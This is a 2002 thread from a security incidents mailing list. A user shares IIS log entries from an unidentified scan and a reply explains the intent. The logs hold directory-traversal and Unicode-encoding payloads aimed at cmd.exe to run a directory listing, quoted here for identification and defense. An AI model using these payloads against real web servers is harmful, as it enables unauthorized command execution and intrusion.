RE: Arhas?

["Starbuck Newton" <starbuck () miamiheartresearch org>]

It looks like the scan is trying to execute a directory listing of files that have the read, hidden, archive or system 
file attributes set. A quick grep on our apache logs did not turn up anything similar.


-----Original Message-----
From: K M [mailto:kmoon01 () hotmail com] 
Sent: Friday, March 01, 2002 10:57 AM
To: incidents () securityfocus org
Subject: Arhas?

Hi,
  Does anybody recognize the IIS scan below?  A google search on the string 
"a-r-h-a-s" turns up a brief report on the incidents.org intrusions list, 
but no identification.

TIA,
K



get /scripts/..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..á../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..à%9v../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..à%qf../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..á%8s../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..á%pc../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..o../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..ð€€¯../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..ø€€€¯../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..ü€€€€¯../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 
404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 
/c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /iisadmpwd/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 
/c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /cgi-bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 
/c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /samples/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 
/c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /_vti_cnf/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 
/c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /adsamples/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 
/c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0


_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp.


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com